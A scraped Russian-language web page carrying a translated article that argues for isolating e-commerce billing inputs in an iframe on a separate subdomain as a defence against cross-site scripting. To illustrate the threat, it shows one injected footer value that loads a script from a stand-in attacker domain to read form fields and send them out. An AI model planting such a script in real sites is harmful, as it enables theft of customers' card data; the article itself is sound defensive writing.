Случай с в безопасных контекстах</h1> <nav style="font-size:0.9em;margin:25px 0px 0px 0px;" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="/">Главная</a></li> <li class="breadcrumb-item"><a href="/articles/">Статьи</a></li> <li class="breadcrumb-item active" aria-current="page">Случай с <iframe>в безопасных контекстах</li> </ol> </nav> <div class="post-content"> <h4>Ваш UX небезопасен, не доверяйте ему данные клиентов</h4> <p><em>В этой статье пропагандируется использование фреймов iframe в безопасных контекстах, например на страницах оплаты и выставления счетов в электронной торговле, и описываются известные атаки, которые подчеркивают необходимость этого. Демонстрируется конкретная атака вредоносного ПО JavaScript и способы ее обхода.</em></p> <p><img loading="lazy" src='https://i2.wp.com/miro.medium.com/1G64Tk7HuRTMaF73CIJvYzw.png' /></p> <p>Недавно я обсуждал с коллегой, почему архитектура электронной коммерции определенного клиента опиралась на внутренний фрейм (Iframe) на странице выставления счетов. Это полностью противоречило прекрасной структуре кода на остальной части сайта, и я решил, что сейчас самое время просмотреть историю безопасности.</p> <h3>Безопасность через разделение</h3> <p>Причина, по которой эта конкретная платформа электронной коммерции содержала функциональность страницы выставления счетов в iframe, была восхитительно проста: они смогли предотвратить атаки межсайтового скриптинга (XSS), встроив поля формы в «iframe», обслуживаемый отдельным субдоменом (с строгая политика одинакового происхождения).</p> <p>Как это работает?</p> <p>Основной домен <code>mysite.com</code> построил страницу электронной коммерции: панель навигации, заголовок, описания, нижний колонтитул, любую рекламу или маркетинговые всплески — обычное дело. Однако для целей пользовательского ввода поля содержались в теге <code><iframe></code>, обслуживающем контент из <code>secure.mysite.com</code>, а веб-сервер был настроен для той же политики происхождения.</p> <p>Другими словами, «Уважаемый браузер, не позволяйте функциям JavaScript/AJAX передаваться между содержимым двух сайтов».</p> <p>Почему?</p> <p>Потому что JavaScript может читать поля ввода, <em>включая данные кредитной карты</em>.</p> <h3>Взлом пользовательского опыта</h3> <p>Веб-сервер не должен быть взломан, чтобы взломать пользовательский опыт клиента. Говоря более кратко: только потому, что код сервера (будь то C#, PHP, Ruby или что-то еще) не был скомпрометирован, не означает, что хитрый злоумышленник не нашел способ инициировать межсайтовый скриптинг. атака.</p> <p>Например, представьте себе этот новый случай:</p> <p>Большинство веб-сайтов имеют общие элементы, которые проходят по всему сайту, например, нижний колонтитул!</p> <p>Многие сайты также позволяют пользователям-администраторам динамически настраивать эти элементы, при этом сами данные хранятся где-то в базе данных.</p> <p>Что происходит, когда злоумышленник использует последний эксплойт 0-day MySQL, чтобы переименовать поле в вашем нижнем колонтитуле с <code>Terms of Service</code> на <code>Terms of Service<script>jQuery.getScript("evildomainhere.com/exploit.js");</script></code>, и один из программистов пропустил <em>один случай очистки, позволяющий отобразить его на странице</em> .</p> <p>Что ж, теперь на каждой из ваших страниц есть эксплойт-скрипт, который считывает поля ввода и каждые несколько секунд звонит домой.</p> <p>Другими словами: всегда будут ошибки. Кто-то <em>всегда найдет способ</em> атаковать ваш сайт. Почему бы с самого начала не исключить хотя бы возможность атаки с использованием межсайтовых сценариев?</p> <h3>Резюме</h3> <ul><li>Встраивая важные поля ввода для выставления счетов в ‹iframe› на отдельном субдомене, вы можете предотвратить определенные направления атак.</li><li>Сценарии эксплойтов, подобные приведенному выше, наблюдались в дикой природе и обычно добавляются в базы данных сигнатур вирусов.</li></ul> </div> <div class="row"> <div class="col-sm-6"> <a class="btn btn-primary btn-sm" href="/tag/web-development/">Web Development</a> <a class="btn btn-primary btn-sm" href="/tag/security/">Security</a> <a class="btn btn-primary btn-sm" href="/tag/html5/">Html5</a> <a class="btn btn-primary btn-sm" href="/tag/hacking/">Hacking</a> <a class="btn btn-primary btn-sm" href="/tag/javascript/">JavaScript</a> </div> <div class="col-sm-6 text-right"> <i style="font-size: 20px;" class="material-icons inline-icon">schedule</i> <span style="font-size:0.9em;">25.03.2024</span> </div> </div> </div> </div> </div> <div id="sidebar-right" class="col-sm-2"> <div class="sidebar-block"> <ul class="related-questions"> <h4>Похожие вопросы</h4> <li><a href="/questions/24943446/">Необходимо добавить новый столбец (ColumnAxColumnB) и вставить новую строку внизу для окончательной суммы (новый столбец)</a></li> <li><a href="/questions/21507844/">экспорт в excel 2003 с одним столбцом в формате индийских чисел с использованием NPOI</a></li> <li><a href="/questions/26107519/">Базовый SAS: реструктуризация набора данных для кросс-табуляции</a></li> <li><a href="/questions/11596915/">Выпадающее меню CSS — промежутки между выпадающим меню и подменю исчезают в IE</a></li> <li><a href="/questions/60331147/">joda DateTimeFormat вопрос форматирования локального часового пояса</a></li> <li><a href="/questions/37035691/">laravel 5.2 - создать пароль для пользователя</a></li> <li><a href="/questions/58596231/">Проверка ListBoxItem, а не ListBox INotifyDataErrorInfo</a></li> <li><a href="/questions/63518316/">Не могу вызвать ParametizedThread из дочерней формы</a></li> <li><a href="/questions/57718515/">Скопируйте НЕСКОЛЬКО значений столбца из одной таблицы в другую совпадающие идентификаторы - SQLite</a></li> <li><a href="/questions/17682485/">Пользовательский интерфейс jQuery, выбираемый в подключенных сортируемых списках</a></li> <li><a href="/questions/61724748/">Скаффолд: машина разработки AMD64 (Mac), удаленный кластер ARM64 выбирает образы AMD64</a></li> <li><a href="/questions/31501166/">тома docker-compose не работают таким образом</a></li> <li><a href="/questions/31436212/">Точки останова XCode не работают для конкретного проекта</a></li> <li><a href="/questions/61816567/">vue-router должен маршрутизироваться по клику, а не работать</a></li> <li><a href="/questions/43637300/">Как уничтожить элемент localStorage - Angular</a></li> <li><a href="/questions/63152099/">Ищем эквивалент в postgresql для обновления слиянием, реализованного в mssql</a></li> <li><a href="/questions/15520799/">почему обновленные значения не получают сообщения в jqgrid</a></li> <li><a href="/questions/36663759/">UITableView переходит наверх при добавлении к нему новых ячеек. Как это предотвратить?</a></li> <li><a href="/questions/36910862/">Настройка того, что происходит при нажатии «вкладки» в графическом интерфейсе Netbeans Swing</a></li> <li><a href="/questions/13091664/">Xcode Interface Builder отдельный ViewController для управления подпредставлением</a></li> </ul> </div> </div> </div> </div> </div> <div id="footer" class="container-fluid"> <div class="row"> <div class="col-sm-2"></div> <div class="col-sm-8"> (c) 2024 - design-hero.ru <span style="color:silver;"> [<a target="_blank" href="https://design-hero.ru/uz/">uz</a>, <a target="_blank" href="https://design-hero.ru/ro/">ro</a>, <a target="_blank" href="https://design-hero.ru/pl/">pl</a>] </span> </div> <div class="col-sm-2 text-center"> <a href="https://www.liveinternet.ru/click" target="_blank"><img id="licnt555B" width="88" height="31" style="border:0" title="LiveInternet" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7" alt=""/></a><script>(function(d,s){d.getElementById("licnt555B").src= "https://counter.yadro.ru/hit?t57.6;r"+escape(d.referrer)+ ((typeof(s)=="undefined")?"":";s"+s.width+""+s.height+"*"+ (s.colorDepth?s.colorDepth:s.pixelDepth))+";u"+escape(d.URL)+ ";h"+escape(d.title.substring(0,150))+";"+Math.random()}) (document,screen)</script> <br><br> </div> </div> </div> </body> </html>